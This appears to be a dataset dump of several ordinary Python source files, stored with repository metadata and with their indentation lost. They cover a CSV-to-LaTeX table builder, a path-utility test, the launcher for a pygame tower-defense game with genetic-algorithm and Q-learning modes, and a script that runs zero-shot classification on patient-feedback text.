table += r'\end{tabular}'
return table
def determine_col_widths(rows: list) -> tuple:
keys = list(rows[0].keys())
widths = [8 * len(key) for key in keys]
for idx, key in enumerate(keys):
for row in rows:
n_chars = len(row[key])
if 8 * n_chars > widths[idx]:
widths[idx] = 8 * n_chars
return tuple([w + 1 for w in widths])
def parse_line(line: list) -> str:
keys = list(line.keys())
string = ''
for idx, key in enumerate(keys):
string += line[key]
if idx != len(keys) - 1:
string += r' & '
return string + r' \\'
def read_csv(filename: str, encoding: str = 'utf8') -> list:
with open(filename, 'r', encoding=encoding) as csv_file:
reader = DictReader(csv_file)
rows = [r for r in reader]
csv_file.close()
return rows
def write_txt(content: str, filename: str):
with open(filename, 'w') as txt_file:
txt_file.write(content)
txt_file.close()
| from csv import DictReader
def construct_header(line: list) -> list:
keys = list(line.keys())
header = r'\hline \\[-3.6 ex] '
for idx, key in enumerate(keys):
header += key
if idx != len(keys) - 1:
header += ' & '
return header + r' \\' + r' [0.2 ex] \hline \\ [-3 ex]'
def construct_table(header: str, lines: list, col_widths: tuple) -> str:
table = r'\begin{tabular}{'
for idx, width in enumerate(col_widths):
table += r'p{' + str(width) + 'px}'
if idx != len(col_widths) - 1:
table += r' '
table += r'}' + '\n'
table += ' ' + header + '\n'
for line in lines:
table += r' ' + line + '\n'
table += r'\end{tabular}'
return table
def determine_col_widths(rows: list) -> tuple:
keys = list(rows[0].keys())
widths = [8 * len(key) for key in keys]
for idx, key in enumerate(keys):
for row in rows:
n_chars = len(row[key])
if 8 * n_chars > widths[idx]:
widths[idx] = 8 * n_chars
return tuple([w + 1 for w in widths])
def parse_line(line: list) -> str:
keys = list(line.keys())
string = ''
for idx, key in enumerate(keys):
string += line[key]
if idx != len(keys) - 1:
string += r' & '
return string + r' \\'
def read_csv(filename: str, encoding: str = 'utf8') -> list:
with open(filename, 'r', encoding=encoding) as csv_file:
reader = DictReader(csv_file)
rows = [r for r in reader]
csv_file.close()
return rows
def write_txt(content: str, filename: str):
with open(filename, 'w') as txt_file:
txt_file.write(content)
txt_file.close() | none | 1 | 3.204311 | 3 | |
tests/file/test_path.py | anchoranalysis/anchor-python-utilities | 0 | 6623948 | <reponame>anchoranalysis/anchor-python-utilities<gh_stars>0
"""Tests :mod:`file.path`"""
from anchor_python_utilities import file
import os
def test_path_same_directory() -> None:
assert file.path_same_directory("go/a", "b.txt") == os.path.join("go", "b.txt")
| """Tests :mod:`file.path`"""
from anchor_python_utilities import file
import os
def test_path_same_directory() -> None:
assert file.path_same_directory("go/a", "b.txt") == os.path.join("go", "b.txt") | en | 0.161376 | Tests :mod:`file.path` | 2.579949 | 3 |
AI_Tower_Defense/src/main.py | aasquier/AI_Tower_Defense | 0 | 6623949 | import pygame
from enum import Enum
from game.game import Game
from experiment.qLearning.serialQLearning import SerialQLearning
from experiment.qLearning.parallelQLearning import ParallelQLearning
from experiment.geneticAlgorithm.parallelGA import ParallelGeneticAlgorithm
from experiment.geneticAlgorithm.serialGA import SerialGeneticAlgorithm
from experiment.deepQlearning import DeepQlearning
from agent.geneticAgent import GeneticAgent
from constants.gameConstants import *
class MODE(Enum):
manual = 0,
geneticAlgorithm = 1,
qLearning = 2,
deepQlearning = 3
GAME_MODE = MODE.manual # Select which mode to run the game in
PARALLEL_MODE = False # Run a game on each processor core (only when visual_mode is off)
COLLECT_WHOLE_GAME_DATA = False # Game data collection for the GA
COLLECT_INNER_GAME_DATA = False # " "
Q_TRAINING_MODE = True # Update Q table after every game
VISUAL_MODE = True # Display Graphics
READ_FILE = False # Read model from file and continue training from it
SAVE_TO_DISK = False # Collect and store data
PRINT_GRAPHS = False # Prints graphs of score averages
# the game expects the following signature:
# Game(visualMode, towers, gameRecord, collectInnerGameData, deepQagent)
def main():
''' Entry point for game '''
#Setup Game
pygame.init()
pygame.font.init()
pygame.mixer.init()
pygame.display.set_caption("AI Tower Defense")
displaySettings()
# Determine game mode
if GAME_MODE == MODE.manual:
game = Game(True, [], None, False, None)
game.run()
elif GAME_MODE == MODE.geneticAlgorithm:
if PARALLEL_MODE:
gaAlgo = ParallelGeneticAlgorithm(VISUAL_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS, COLLECT_WHOLE_GAME_DATA, COLLECT_INNER_GAME_DATA)
else:
gaAlgo = SerialGeneticAlgorithm(VISUAL_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS, COLLECT_WHOLE_GAME_DATA, COLLECT_INNER_GAME_DATA)
gaAlgo.run()
elif GAME_MODE == MODE.qLearning:
if PARALLEL_MODE:
qLearning = ParallelQLearning(VISUAL_MODE, Q_TRAINING_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS)
else:
qLearning = SerialQLearning(VISUAL_MODE, Q_TRAINING_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS)
qLearning.run()
elif GAME_MODE == MODE.deepQlearning:
deepQ = DeepQlearning(VISUAL_MODE)
deepQ.run()
pygame.quit()
def displaySettings():
''' Displays the current game settings '''
print(f"\n=== AI Tower Defense Settings ===")
print(f"Game Mode: {GAME_MODE.name}")
if GAME_MODE.name == "qLearning":
print(f"Training Mode: {Q_TRAINING_MODE}")
print(f"Parallel Mode: {PARALLEL_MODE}")
print(f"Visual Mode: {VISUAL_MODE}")
print(f"Load model from file: {READ_FILE}")
print(f"Save model to file: {SAVE_TO_DISK}")
print(f"Save graphs: {PRINT_GRAPHS}\n")
if __name__ == "__main__":
main()
| import pygame
from enum import Enum
from game.game import Game
from experiment.qLearning.serialQLearning import SerialQLearning
from experiment.qLearning.parallelQLearning import ParallelQLearning
from experiment.geneticAlgorithm.parallelGA import ParallelGeneticAlgorithm
from experiment.geneticAlgorithm.serialGA import SerialGeneticAlgorithm
from experiment.deepQlearning import DeepQlearning
from agent.geneticAgent import GeneticAgent
from constants.gameConstants import *
class MODE(Enum):
manual = 0,
geneticAlgorithm = 1,
qLearning = 2,
deepQlearning = 3
GAME_MODE = MODE.manual # Select which mode to run the game in
PARALLEL_MODE = False # Run a game on each processor core (only when visual_mode is off)
COLLECT_WHOLE_GAME_DATA = False # Game data collection for the GA
COLLECT_INNER_GAME_DATA = False # " "
Q_TRAINING_MODE = True # Update Q table after every game
VISUAL_MODE = True # Display Graphics
READ_FILE = False # Read model from file and continue training from it
SAVE_TO_DISK = False # Collect and store data
PRINT_GRAPHS = False # Prints graphs of score averages
# the game expects the following signature:
# Game(visualMode, towers, gameRecord, collectInnerGameData, deepQagent)
def main():
''' Entry point for game '''
#Setup Game
pygame.init()
pygame.font.init()
pygame.mixer.init()
pygame.display.set_caption("AI Tower Defense")
displaySettings()
# Determine game mode
if GAME_MODE == MODE.manual:
game = Game(True, [], None, False, None)
game.run()
elif GAME_MODE == MODE.geneticAlgorithm:
if PARALLEL_MODE:
gaAlgo = ParallelGeneticAlgorithm(VISUAL_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS, COLLECT_WHOLE_GAME_DATA, COLLECT_INNER_GAME_DATA)
else:
gaAlgo = SerialGeneticAlgorithm(VISUAL_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS, COLLECT_WHOLE_GAME_DATA, COLLECT_INNER_GAME_DATA)
gaAlgo.run()
elif GAME_MODE == MODE.qLearning:
if PARALLEL_MODE:
qLearning = ParallelQLearning(VISUAL_MODE, Q_TRAINING_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS)
else:
qLearning = SerialQLearning(VISUAL_MODE, Q_TRAINING_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS)
qLearning.run()
elif GAME_MODE == MODE.deepQlearning:
deepQ = DeepQlearning(VISUAL_MODE)
deepQ.run()
pygame.quit()
def displaySettings():
''' Displays the current game settings '''
print(f"\n=== AI Tower Defense Settings ===")
print(f"Game Mode: {GAME_MODE.name}")
if GAME_MODE.name == "qLearning":
print(f"Training Mode: {Q_TRAINING_MODE}")
print(f"Parallel Mode: {PARALLEL_MODE}")
print(f"Visual Mode: {VISUAL_MODE}")
print(f"Load model from file: {READ_FILE}")
print(f"Save model to file: {SAVE_TO_DISK}")
print(f"Save graphs: {PRINT_GRAPHS}\n")
if __name__ == "__main__":
main()
| en | 0.853552 | # Select which mode to run the game in # Run a game on each processor core (only when visual_mode is off) # Game data collection for the GA # " " # Update Q table after every game # Display Graphics # Read model from file and continue training from it # Collect and store data # Prints graphs of score averages # the game expects the following signature: # Game(visualMode, towers, gameRecord, collectInnerGameData, deepQagent) Entry point for game #Setup Game # Determine game mode Displays the current game settings | 2.536092 | 3 |
Zero_shot/hg_zero_shot.py | CDU-data-science-team/zero-shot | 0 | 6623950 | <reponame>CDU-data-science-team/zero-shot
import pandas as pd
import io
import requests
from transformers import pipeline
# Read clean data (rows code XX removed) file from GitHub repo pxtextmining
# https://stackoverflow.com/questions/32400867/pandas-read-csv-from-url
url = "https://raw.githubusercontent.com/CDU-data-science-team/pxtextmining/development/datasets/text_data.csv"
s = requests.get(url).content
df = pd.read_csv(io.StringIO(s.decode('utf-8')), encoding='utf-8')
print(df.isna().sum())
df = df[df['feedback'].notna()] # Remove records with no feedback text
print(df.isna().sum())
# Zero-shot pipeline
# https://colab.research.google.com/drive/1jocViLorbwWIkTXKwxCOV9HLTaDDgCaw?usp=sharing
classifier = pipeline("zero-shot-classification")
sequences = df.feedback.tolist()
candidate_labels = df.label.unique()
candidate_labels.sort()
n_sequences = 3
zs = classifier(sequences[0:n_sequences], candidate_labels, multi_label=True) # A list of dicts with "sequence", "labels" and "scores".
scores = []
class_pred = []
for i in range(0, len(zs)):
scores.append(pd.DataFrame([zs[i]['scores']], columns=zs[i]['labels']))
max_score = max(zs[i]['scores'])
max_index = zs[i]['scores'].index(max_score)
class_pred.append(zs[i]['labels'][max_index])
scores = pd.concat(scores)
scores = scores.reindex(sorted(scores.columns), axis=1)
scores['class_pred'] = class_pred
scores['class'] = df['label'][0:n_sequences].to_numpy()
print(scores)
scores.to_csv('zs_preds.csv') | import pandas as pd
import io
import requests
from transformers import pipeline
# Read clean data (rows code XX removed) file from GitHub repo pxtextmining
# https://stackoverflow.com/questions/32400867/pandas-read-csv-from-url
url = "https://raw.githubusercontent.com/CDU-data-science-team/pxtextmining/development/datasets/text_data.csv"
s = requests.get(url).content
df = pd.read_csv(io.StringIO(s.decode('utf-8')), encoding='utf-8')
print(df.isna().sum())
df = df[df['feedback'].notna()] # Remove records with no feedback text
print(df.isna().sum())
# Zero-shot pipeline
# https://colab.research.google.com/drive/1jocViLorbwWIkTXKwxCOV9HLTaDDgCaw?usp=sharing
classifier = pipeline("zero-shot-classification")
sequences = df.feedback.tolist()
candidate_labels = df.label.unique()
candidate_labels.sort()
n_sequences = 3
zs = classifier(sequences[0:n_sequences], candidate_labels, multi_label=True) # A list of dicts with "sequence", "labels" and "scores".
scores = []
class_pred = []
for i in range(0, len(zs)):
scores.append(pd.DataFrame([zs[i]['scores']], columns=zs[i]['labels']))
max_score = max(zs[i]['scores'])
max_index = zs[i]['scores'].index(max_score)
class_pred.append(zs[i]['labels'][max_index])
scores = pd.concat(scores)
scores = scores.reindex(sorted(scores.columns), axis=1)
scores['class_pred'] = class_pred
scores['class'] = df['label'][0:n_sequences].to_numpy()
print(scores)
scores.to_csv('zs_preds.csv') | en | 0.584223 | # Read clean data (rows code XX removed) file from GitHub repo pxtextmining # https://stackoverflow.com/questions/32400867/pandas-read-csv-from-url # Remove records with no feedback text # Zero-shot pipeline # https://colab.research.google.com/drive/1jocViLorbwWIkTXKwxCOV9HLTaDDgCaw?usp=sharing # A list of dicts with "sequence", "labels" and "scores". | 2.709579 | 3 |